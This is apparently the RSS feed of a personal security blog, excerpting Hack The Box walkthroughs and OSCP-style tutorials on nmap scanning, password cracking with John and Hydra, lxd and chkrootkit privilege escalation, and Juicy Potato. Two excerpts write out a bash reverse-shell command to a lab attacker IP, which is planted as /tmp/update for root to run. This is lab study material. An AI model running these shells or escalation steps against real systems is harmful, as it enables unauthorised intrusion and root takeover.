Nmap scan report for 10.10.10.17
Host is up (0.042s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES USER AUTH-RESP-CODE TOP SASL(PLAIN) PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID LOGIN-REFERRALS more AUTH=PLAINA0001 have listed LITERAL+ capabilities IMAP4rev1 post-login Pre-login SASL-IR OK IDLE ENABLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_ http/1.1
| tls-nextprotoneg: 
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;There was a certificate warning on https service. The site looks like below( seems ngnix is running)&lt;/p&gt;</description></item><item><title>lxd group privilege escalation</title><link>https://www.rchitect.in/posts/lxd/</link><pubDate>Thu, 14 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/lxd/</guid><description>&lt;h1 id="lxd-group-privilege-escalation"&gt;
 lxd group privilege escalation
 &lt;a class="heading-link" href="#lxd-group-privilege-escalation"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="scanrio-as-per-checking-the-user-privilege--there-is-one-thing-which-can-help-us-escalating-the-privilegeuser-belong-lxd-group"&gt;
 Scanrio: As per checking the user privilege , there is one thing which can help us escalating the privilege.User belong lxd group
 &lt;a class="heading-link" href="#scanrio-as-per-checking-the-user-privilege--there-is-one-thing-which-can-help-us-escalating-the-privilegeuser-belong-lxd-group"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;There are some exploits which shows the lxd privileges can be &lt;a href="https://www.hackingarticles.in/lxd-privilege-escalation/" class="external-link" target="_blank" rel="noopener"&gt;escalated&lt;/a&gt;.&lt;/p&gt;
&lt;h6 id="on-kali-machine"&gt;
 On Kali machine:
 &lt;a class="heading-link" href="#on-kali-machine"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;p&gt;Download and build the alpine image&lt;/p&gt;</description></item><item><title>John the ripper as passowrd cracking tool</title><link>https://www.rchitect.in/posts/john-ripper/</link><pubDate>Wed, 13 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/john-ripper/</guid><description>&lt;h1 id="john-the-ripper-for-bruteforcing"&gt;
 John the Ripper for Bruteforcing
 &lt;a class="heading-link" href="#john-the-ripper-for-bruteforcing"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h4 id="case1-the-zip-passowrd-cracking"&gt;
 Case1: The zip passowrd cracking
 &lt;a class="heading-link" href="#case1-the-zip-passowrd-cracking"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;p&gt;In below case there is zip file which require password to open.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;──(rocky㉿kali)-[~/hckbox/node]
└─$ unzip newbackup.zip 
Archive: newbackup.zip
 creating: var/www/myplace/
[newbackup.zip] var/www/myplace/package-lock.json password: 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This requires a password and we need to crack the zip with john to get passowrd.&lt;/p&gt;
&lt;p&gt;As this is a zip file we need to use the script from John for converting this to a hash value. The scripts are usually located under /usr/share/john&lt;/p&gt;</description></item><item><title>File transfer between Windows,Linux machines</title><link>https://www.rchitect.in/posts/file-upload/</link><pubDate>Tue, 05 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/file-upload/</guid><description>&lt;h1 id="file-transfer-between-windowslinux-machines"&gt;
 File Transfer between Windows,Linux Machines
 &lt;a class="heading-link" href="#file-transfer-between-windowslinux-machines"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h3 id="method-1--ftp"&gt;
 Method-1- FTP
 &lt;a class="heading-link" href="#method-1--ftp"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Some time FTP option is enabled with &amp;ldquo;anonymous&amp;rdquo; user and password any or blank.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp&amp;gt; ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp&amp;gt; ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp&amp;gt; pwd
257 &amp;#34;/&amp;#34; is current directory.
ftp&amp;gt; ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp&amp;gt; exit
421 Service not available, remote server has closed connection

┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ echo &amp;#34;sample file rchitect&amp;#34; &amp;gt; test.txt

┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116 
ftp: connect: Connection timed out
ftp&amp;gt; exit

┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp&amp;gt; ^C
ftp&amp;gt; exit

┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp&amp;gt; put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
22 bytes sent in 0.00 secs (477.4305 kB/s)
ftp&amp;gt; exit
221 Goodbye.
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="method-2---smb-transfer"&gt;
 Method-2 - SMB Transfer
 &lt;a class="heading-link" href="#method-2---smb-transfer"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;If we have reverse normal shell to the Windows machine, most of the case &amp;ldquo;SMB transfer&amp;rdquo; should work&lt;/p&gt;</description></item><item><title>Hackthebox Node</title><link>https://www.rchitect.in/posts/htb-node/</link><pubDate>Tue, 05 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-node/</guid><description>&lt;h1 id="hackthebox-node-walkthrough"&gt;
 Hackthebox Node Walkthrough
 &lt;a class="heading-link" href="#hackthebox-node-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/node/1.png" alt="node"&gt;&lt;/p&gt;
&lt;h3 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.58 1 ⨯
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:43 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.10% done; ETC: 19:43 (0:00:09 remaining)
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp

$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.58 1 ⨯
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:57 EDT
Nmap scan report for 10.10.10.58
Host is up.
All 65535 scanned ports on 10.10.10.58 are open|filtered
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="vulnarability-scan"&gt;
 Vulnarability Scan
 &lt;a class="heading-link" href="#vulnarability-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;ocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,3000 -sC -sV -oN details.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 20:04 EDT
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_ Logs: /login
| hadoop-tasktracker-info: 
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can see 2 ports open and on port 3000 apache service seems running. This is how the page lookes on port 3000&lt;/p&gt;</description></item><item><title>Nmap timers</title><link>https://www.rchitect.in/posts/nmaptimers/</link><pubDate>Wed, 30 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/nmaptimers/</guid><description>&lt;h1 id="what-are-max-retries-and-min-rate-in-nmap"&gt;
 What are max retries and min-rate in nmap
 &lt;a class="heading-link" href="#what-are-max-retries-and-min-rate-in-nmap"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="max-retries"&gt;
 Max-retries
 &lt;a class="heading-link" href="#max-retries"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;Its mainly used for troubleshooting purpose to confirm the ports open.&lt;/p&gt;
&lt;p&gt;Higher the number it will provide accurate results. Lower the number the scan complete fast. If you you put max-retries as 0 it just scan single time and stops.&lt;/p&gt;
&lt;p&gt;Command:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;nmap -Pn --max-retries 0 -p 80 10.10.10.43 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;If you are looking for some specific ports, you can try this simple script:&lt;/p&gt;</description></item><item><title>Directory scan to identify the sub domains of website</title><link>https://www.rchitect.in/posts/directoryscan/</link><pubDate>Tue, 29 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/directoryscan/</guid><description>&lt;h1 id="directory-scanning-to-identify-the-sub-domains"&gt;
 Directory Scanning to identify the sub domains
 &lt;a class="heading-link" href="#directory-scanning-to-identify-the-sub-domains"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;Using the gobuster fing the sub directories&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;gobuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.88
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/23 20:44:04 Starting gobuster in directory enumeration mode
===============================================================
/webservices (Status: 301) [Size: 316] [--&amp;gt; http://10.10.10.88/webservices/]
/server-status (Status: 403) [Size: 299] 

===============================================================
2022/03/23 21:01:06 Finished
===============================================================###### Login Credentials and Rabithole
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;As we found one sub directory, always run one more gobuster scan with new subdirectory url to find if any more sub directories are present.&lt;/p&gt;</description></item><item><title>Hackthebox Tartarsauce</title><link>https://www.rchitect.in/posts/htb-tartar/</link><pubDate>Sat, 26 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-tartar/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Tartarsauce&lt;/p&gt;</description></item><item><title>EOF in bash scripting</title><link>https://www.rchitect.in/posts/bash-script-eof/</link><pubDate>Mon, 21 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/bash-script-eof/</guid><description>&lt;h1 id="how-to-use-eof-in-bash-scripting"&gt;
 How to use EOF in bash scripting
 &lt;a class="heading-link" href="#how-to-use-eof-in-bash-scripting"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;As a newbie to scripting, i was using the printf command to input a muti-line script to a file&lt;/p&gt;
&lt;h4 id="how-i-used-printf-to-input-a-script-to-file"&gt;
 How i used printf to input a script to file
 &lt;a class="heading-link" href="#how-i-used-printf-to-input-a-script-to-file"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;amrois@nineveh:/tmp$ printf &amp;#39;#!/bin/sh\n&amp;#39; &amp;gt; update
amrois@nineveh:/tmp$ printf &amp;#39;/bin/bash -c &amp;#34;/bin/bash -i &amp;gt; /dev/tcp/10.10.14.9/5555 0&amp;lt;&amp;amp;1&amp;#34;\n&amp;#39; &amp;gt;&amp;gt; update
amrois@nineveh:/tmp$ chmod +x update 
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="how-eof-can-simplify-input-of-multi-line-script-to-a-file"&gt;
 How EOF can simplify input of multi-line script to a file
 &lt;a class="heading-link" href="#how-eof-can-simplify-input-of-multi-line-script-to-a-file"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat &amp;gt; /tmp/update &amp;lt;&amp;lt; EOF
#!/bin/sh
/bin/bash -c &amp;#34;/bin/bash -i &amp;gt; /dev/tcp/10.10.14.3/5555 0&amp;lt;&amp;amp;1&amp;#34;
touch /tmp/done1
EOF
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;View the file now&lt;/p&gt;</description></item><item><title>Bruteforce using Hydra</title><link>https://www.rchitect.in/posts/hydra/</link><pubDate>Sun, 20 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/hydra/</guid><description>&lt;h1 id="bruteforce-using-hydra"&gt;
 Bruteforce using Hydra
 &lt;a class="heading-link" href="#bruteforce-using-hydra"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;To use Hydra we need to mainly identify 4 Parameters:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;IP Address&amp;gt; = &amp;#34;&amp;#34;

&amp;lt;Login Page&amp;gt; = &amp;#34;&amp;#34;

&amp;lt;Request Body&amp;gt; = &amp;#34;&amp;#34;

&amp;lt;Error Message&amp;gt; =&amp;#34;&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;To identify these parameters, lets intercept the request with Burp.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/Nineveh/4.png" alt="hydra"&gt;&lt;/p&gt;
&lt;p&gt;Based on the intercepted values, I have filled the values for HTTPS site subdomain&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;= &amp;ldquo;10.10.10.43&amp;rdquo;&lt;/p&gt;
&lt;p&gt;= &amp;ldquo;/db/index.php&amp;rdquo;&lt;/p&gt;
&lt;p&gt;= &amp;ldquo;^PASS^&amp;amp;login=Log+In&amp;amp;proc_login=true&amp;rdquo;&lt;/p&gt;
&lt;p&gt;=&amp;ldquo;Incorrect password.&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now Formulate the bruteforce command using hydra. For using hydra always username is required. In this case we can give any fixed value. Remember to use &amp;ldquo;https-post-form&amp;rdquo; as its a ssl website.&lt;/p&gt;</description></item><item><title>Hackthebox Nineveh</title><link>https://www.rchitect.in/posts/htb-nineveh/</link><pubDate>Sat, 19 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-nineveh/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Nineveh&lt;/p&gt;</description></item><item><title>Privilege Escalation in Linux</title><link>https://www.rchitect.in/posts/linux-pivilege/</link><pubDate>Thu, 17 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/linux-pivilege/</guid><description>&lt;h1 id="privilege-escalation-for-linux-machines-before-running-scripts-like-linpeas"&gt;
 Privilege Escalation for Linux machines before running scripts like linpeas
 &lt;a class="heading-link" href="#privilege-escalation-for-linux-machines-before-running-scripts-like-linpeas"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;I am trying explain the few commands which i use before i use any privilege escalation scripts like linpeas,linenum etc.&lt;/p&gt;
&lt;h3 id="sudo-privilege"&gt;
 Sudo Privilege
 &lt;a class="heading-link" href="#sudo-privilege"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Check for any commands which are enabled with Sudo privilege and no password required to run. Remember that some time, you may have to erminate and re-initiate existing session, if no suo command is enabled.&lt;/p&gt;</description></item><item><title>ENV PATH variable update in Linux</title><link>https://www.rchitect.in/posts/update-path/</link><pubDate>Thu, 10 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/update-path/</guid><description>&lt;h1 id="env-path-variable-update"&gt;
 ENV PATH Variable update
 &lt;a class="heading-link" href="#env-path-variable-update"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;I have recently installed SNAPD and HUGO. But i am unable to run this &amp;ldquo;hugo version&amp;rdquo; as the installed folder does not fall under the default /bin or /usr/bin. Refer the error&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ hugo version 127 ⨯
Command &amp;#39;hugo&amp;#39; is available in &amp;#39;/snap/bin/hugo&amp;#39;
The command could not be located because &amp;#39;/snap/bin&amp;#39; is not included in the PATH environment variable.
hugo: command not found
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Default ENV variables&lt;/p&gt;</description></item><item><title>File transfer between Windows and Linux</title><link>https://www.rchitect.in/posts/oscp-cheat/</link><pubDate>Thu, 10 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/oscp-cheat/</guid><description>&lt;h1 id="cheat-sheet-for-oscp"&gt;
 Cheat sheet for OSCP
 &lt;a class="heading-link" href="#cheat-sheet-for-oscp"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="reconnaisance"&gt;
 Reconnaisance
 &lt;a class="heading-link" href="#reconnaisance"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;h5 id="nmap-commands-for-port-scan"&gt;
 Nmap Commands for Port scan
 &lt;a class="heading-link" href="#nmap-commands-for-port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;The below 2 nmap scan used to find out the TCP ports opened on server&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;nmap -sT -p- -Pn -T4&amp;ndash;min-rate 10000 -oN alltcp1.txt 10.10.10.58( faster)&lt;/p&gt;
&lt;p&gt;nmap -sT -p- -Pn -T4&amp;ndash;min-rate 10000 -oN alltcp1.txt 10.10.10.58( little slower)&lt;/p&gt;</description></item><item><title>chkrootkit exploit for privilege esclation</title><link>https://www.rchitect.in/posts/chk-rootkit/</link><pubDate>Wed, 09 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/chk-rootkit/</guid><description>&lt;h1 id="chkrootkit-exploit"&gt;
 Chkrootkit Exploit
 &lt;a class="heading-link" href="#chkrootkit-exploit"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;I have tried pspy and i could see the chkrootkit&lt;/p&gt;
&lt;p&gt;Lets search for the exploit&lt;/p&gt;
&lt;p&gt;As per this exploit if you create any exploit ,if you create a file named &amp;ldquo;update&amp;rdquo; under /tmp.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;amrois@nineveh:/tmp$ printf &amp;#39;#!/bin/sh\n&amp;#39; &amp;gt; update
amrois@nineveh:/tmp$ printf &amp;#39;/bin/bash -c &amp;#34;/bin/bash -i &amp;gt; /dev/tcp/10.10.14.9/5555 0&amp;lt;&amp;amp;1&amp;#34;\n&amp;#39; &amp;gt;&amp;gt; update
amrois@nineveh:/tmp$ chmod +x update 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Or You can use EOF to repalce printf command like below&lt;/p&gt;</description></item><item><title>SeImpersonatePrivilege privilege escalation using Juicy Potato</title><link>https://www.rchitect.in/posts/juicy-potato/</link><pubDate>Wed, 09 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/juicy-potato/</guid><description>&lt;h1 id="exploiting-seimpersonateprivilege-using-juicypotato-for-privilege-escalation"&gt;
 Exploiting &amp;lsquo;&amp;lsquo;SeImpersonatePrivilege&amp;rsquo; using Juicypotato for privilege escalation
 &lt;a class="heading-link" href="#exploiting-seimpersonateprivilege-using-juicypotato-for-privilege-escalation"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;Lets take a sceanrio we have initail reverse shell or nomral user shell which requires to be elvated as Administrator.Checking the Privilege of cuurent user we have noticed &amp;ldquo;SeImpersonatePrivilege&amp;rdquo; is enabled.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State 
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The below one privilege can be exploited using the [Juicypotato](&lt;a href="https://github.com/ohpe/juicy-potato/releases/tag/v0.1" class="external-link" target="_blank" rel="noopener"&gt;Release Fresh potatoes · ohpe/juicy-potato · GitHub&lt;/a&gt;) for most of the windows machine&lt;/p&gt;</description></item><item><title>IPSEC enumeration using Strongswan</title><link>https://www.rchitect.in/posts/ipsec-enumeration/</link><pubDate>Tue, 08 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/ipsec-enumeration/</guid><description>&lt;h1 id="vpnike-enumeration"&gt;
 VPN(IKE) enumeration
 &lt;a class="heading-link" href="#vpnike-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;isakmp service( port-500 related to ipsec VPN) only opened on server.There are some inbuilt scanners in Kali linux to enumerate IPSEC VPN&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ ike-scan -M 10.10.10.116 
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
 HDR=(CKY-R=8ec1706b5f6632a8)
 SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
 VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
